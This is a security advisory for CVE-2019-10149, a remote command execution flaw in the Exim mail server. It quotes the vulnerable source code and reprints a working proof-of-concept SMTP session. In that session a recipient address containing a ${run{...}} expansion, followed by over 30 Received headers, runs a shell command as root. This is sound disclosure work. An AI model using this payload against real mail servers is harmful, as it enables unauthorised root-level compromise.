Allele Security Alert
ASA-2019-00320
Identifier(s)
ASA-2019-00320, CVE-2019-10149
Title
Remote command execution (RCE) via recipient address
Vendor(s)
The Exim Maintainers
Product(s)
Exim
Affected version(s)
Exim versions from 4.87 to 4.91
Fixed version(s)
Exim version 4.92
Proof of concept
Unknown
Description
A flaw was found in the way exim validated recipient address. A remote attacker could use this flaw to execute arbitrary command on the exim server with the permissions of the user running the application.
Technical details
The vulnerable code is located in deliver_message():
6122 #ifndef DISABLE_EVENT
6123 if (process_recipients != RECIP_ACCEPT)
6124 {
6125 uschar * save_local = deliver_localpart;
6126 const uschar * save_domain = deliver_domain;
6127
6128 deliver_localpart = expand_string(
6129 string_sprintf("${local_part:%s}", new->address));
6130 deliver_domain = expand_string(
6131 string_sprintf("${domain:%s}", new->address));
6132
6133 (void) event_raise(event_action,
6134 US"msg:fail:internal", new->message);
6135
6136 deliver_localpart = save_local;
6137 deliver_domain = save_domain;
6138 }
6139 #endif
Because expand_string() recognizes the “${run{<command> <args>}}” expansion item, and because new->address is the recipient of the mail that is being delivered, a local attacker can simply send a mail to “${run{…}}@localhost” (where “localhost” is one of Exim’s local_domains) and execute arbitrary commands, as root (deliver_drop_privilege is false, by default):
john@debian:~$ cat /tmp/id
cat: /tmp/id: No such file or directory
john@debian:~$ nc 127.0.0.1 25
220 debian ESMTP Exim 4.89 Thu, 23 May 2019 09:10:41 -0400
HELO localhost
250 debian Hello localhost [127.0.0.1]
MAIL FROM:<>
250 OK
RCPT TO:<${run{\x2Fbin\x2Fsh\t-c\t\x22id\x3E\x3E\x2Ftmp\x2Fid\x22}}@localhost>
250 Accepted
DATA
354 Enter message, ending with "." on a line by itself
Received: 1
Received: 2
Received: 3
Received: 4
Received: 5
Received: 6
Received: 7
Received: 8
Received: 9
Received: 10
Received: 11
Received: 12
Received: 13
Received: 14
Received: 15
Received: 16
Received: 17
Received: 18
Received: 19
Received: 20
Received: 21
Received: 22
Received: 23
Received: 24
Received: 25
Received: 26
Received: 27
Received: 28
Received: 29
Received: 30
Received: 31
.
250 OK id=1hTnYa-0000zp-8b
QUIT
221 debian closing connection
john@debian:~$ cat /tmp/id
cat: /tmp/id: Permission denied
root@debian:~# cat /tmp/id
uid=0(root) gid=111(Debian-exim) groups=111(Debian-exim)
uid=0(root) gid=111(Debian-exim) groups=111(Debian-exim)
In this example:
– we send more than received_headers_max (30, by default) “Received:” headers to the mail server, to set process_recipients to RECIP_FAIL_LOOP and hence execute the vulnerable code;
– we escape invalid characters in the recipient’s address with backslashes, which are conveniently interpreted by expand_string() (in expand_string_internal() and transport_set_up_command()).
Credits
Qualys Research Labs
Reference(s)
CVE-2019-10149: Exim 4.87 to 4.91: possible remote exploit
https://seclists.org/oss-sec/2019/q2/140
CVE-2019-10149 Exim 4.87 to 4.91
https://www.exim.org/static/doc/security/CVE-2019-10149.txt
Fix CVE-2019-10149
https://git.exim.org/exim.git/commit/d740d2111f189760593a303124ff6b9b1f83453d
Exim CVE-2019-10149, how to protect yourself
https://blog.cpanel.com/exim-cve-2019-10149-protect-yourself/
Qualys Security Advisory – The Return of the WIZard: RCE in Exim (CVE-2019-10149)
https://seclists.org/oss-sec/2019/q2/153
CVE-2019-10149
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10149
CVE-2019-10149
https://nvd.nist.gov/vuln/detail/CVE-2019-10149
If there is any error in this alert or you wish a comprehensive analysis, let us know.
Last modified: June 8, 2019